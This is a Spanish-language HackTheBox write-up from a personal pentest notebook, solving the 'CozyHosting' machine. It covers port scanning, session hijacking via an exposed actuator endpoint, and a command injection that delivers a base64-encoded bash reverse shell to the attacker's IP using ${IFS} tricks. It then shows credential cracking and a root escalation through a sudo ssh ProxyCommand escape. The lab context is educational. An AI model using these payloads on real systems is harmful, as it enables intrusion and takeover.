🌐
My Pentest Book
  • πŸ’‘I changed my website
  • πŸ“„WriteUps
    • πŸ΄β€β˜ οΈHTB - HackTheBox
      • ⬛HTB - Advanced Labs
        • Endgames
          • P.O.O.
      • 🟨HTB - Runner
      • 🟩HTB - Usage
      • 🟩HTP - Active (Incomplete)
      • 🟨HTB - Scrambled
      • πŸŸ₯HTB - FormulaX (Incomplete)
      • πŸŸ₯HTB - Office
      • 🟩HTB - Perfection
      • 🟨HTB - WifineticTwo
      • 🟨HTB - Jab (Incomplete)
      • 🟩HTB - Buff
      • 🟨HTB - Hospital
      • 🟩HTB - Crafty
      • 🟩HTB - Bizness
      • 🟩HTB - Devvortex
      • 🟩HTB - CozyHosting
      • 🟩HTB - Analytics
      • 🟩HTB - Codify
      • 🟨HTB - Surveillance
      • 🟨HTB - Monitored
Con tecnologΓ­a de GitBook
En esta pΓ‘gina
  • InformaciΓ³n General
  • Enumeration
  • Ping para obtener ruta de retorno
  • Escaneo de puertos con Nmap
  • Escaneo detallado con Nmap
  • Modificando /etc/hosts
  • Explorando CozyHosting.htb
  • Directory Bruteforce con Dirsearch
  • Acceso al panel de administraciΓ³n
  • Explotando y obteniendo reverse shell
  • John the Ripper
  • Privilege Escalation (GTFO Bins)

ΒΏTe fue ΓΊtil?

Editar en GitHub
  1. WriteUps
  2. HTB - HackTheBox

HTB - CozyHosting

https://app.hackthebox.com/machines/CozyHosting

AnteriorHTB - DevvortexSiguienteHTB - Analytics

Última actualización hace 1 año

ΒΏTe fue ΓΊtil?

InformaciΓ³n General

  • Nombre de la MΓ‘quina: CozyHosting

  • IP de la MΓ‘quina: 10.129.229.88

  • Sistema Operativo: Linux

  • Dificultad: Easy

  • Fecha de PublicaciΓ³n: 02 sep 2023


Enumeration

Ping para obtener ruta de retorno

Realizamos un ping a la mΓ‘quina objetivo para verificar la conectividad y obtener informaciΓ³n sobre la ruta utilizando la opciΓ³n -R para incluir la ruta de retorno:

Kali Linux Machine
ping -c 1 10.129.229.88 -R

El valor de TTL (Time To Live) igual a 63 puede ser indicativo de que el sistema operativo de la mΓ‘quina objetivo es Linux. El TTL es un valor en el campo de los paquetes IP que indica la duraciΓ³n que un paquete puede estar en una red antes de ser descartado. Linux establece por defecto el valor de TTL de sus paquetes IP en 64, que al pasar por un salto en la red se decrementa a 63.

Escaneo de puertos con Nmap

Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la mΓ‘quina objetivo. Utilizamos las opciones -p- para escanear todos los puertos, --open para mostrar solo los puertos abiertos, -sS para un escaneo de tipo TCP SYN, --min-rate 5000 para establecer la velocidad mΓ­nima de paquetes y -vvv para un nivel de verbosidad alto. AdemΓ‘s, utilizamos -n para desactivar la resoluciΓ³n de DNS, -Pn para no realizar el escaneo de ping, y -oG allPorts para guardar la salida en un archivo con formato Greppable para luego utilizar nuestra funciΓ³n extractPorts:

Kali Linux Machine
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.229.88 -oG allPorts
extractPorts allPorts

Escaneo detallado con Nmap

Posteriormente, realizamos un escaneo mΓ‘s detallado de los puertos identificados utilizando la opciΓ³n -sCV para detecciΓ³n de versiones y scripts de enumeraciΓ³n de servicios. EspecΓ­ficamente, indicamos los puertos a escanear con -p __PORTS__ (reemplazando __PORTS__ con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre targeted:

Kali Linux Machine
sudo nmap -sCV -p22,80 10.129.229.88 -oN targeted

Modificando /etc/hosts

Para aΓ±adir la entrada "10.129.229.88 cozyhosting.htb" al archivo /etc/hosts, puedes usar el siguiente comando en la terminal:

Kali Linux Machine
echo "10.129.229.88 cozyhosting.htb" | sudo tee -a /etc/hosts

Explorando CozyHosting.htb

Directory Bruteforce con Dirsearch

dirsearch -u cozyhosting.htb

Una de ellas me es particularmente interesante: /actuator/sessions/

Al parecer esta es la sesiΓ²n de "kanderson", el cual espero que tenga privilegios de administrador. Lo que intento hacer es modificar el valor por el de kanderson.

Este valor va cambiando asΓ­ que atento ahΓ­.

Acceso al panel de administraciΓ³n

En el panel podemos encontrar "Cozy Scanner", jugando con el me encuentro con errores.

Creamos nuestro payload en base64

Kali Linux Machine
echo "bash -i >& /dev/tcp/10.10.15.21/7777 0>&1" | base64 -w 0
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4yMS83Nzc3IDA+JjEK%
;echo${IFS%??}"<base64 payload>"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;
;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4yMS83Nzc3IDA+JjEK%"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

Explotando y obteniendo reverse shell

Inyectamos el payload y le hacemos "URL ENCODE", luego lo enviamos.

Target Linux Machine
script /dev/null -c /bin/bash
export TERM=xterm
stty raw -echo; fg

Reviso y el equipo tiene python3, asΓ­ que inicio un servidor para poder descargar cloudhosting-0.0.1.jar

Target Linux Machine
python3 -m http.server 8888
Kali Linux Machine
curl 10.129.229.88:8888/cloudhosting-0.0.1.jar -o cloud.jar
psql -h 127.0.0.1 -U postgres
Vg&nvzAQ7XxR
\c cozyhosting
\d
select * from users;

John the Ripper

Kali Linux Machine
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

SSH como Josh

Kali Linux Machine
ssh josh@10.129.229.88 
manchesterunited

Privilege Escalation (GTFO Bins)

Target Linux Machine
sudo -l
manchesterunited
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

πŸ“„
πŸ΄β€β˜ οΈ
🟩
ssh | GTFOBins
Logo
Cozy Cloud Admin Dashboard
Pwned!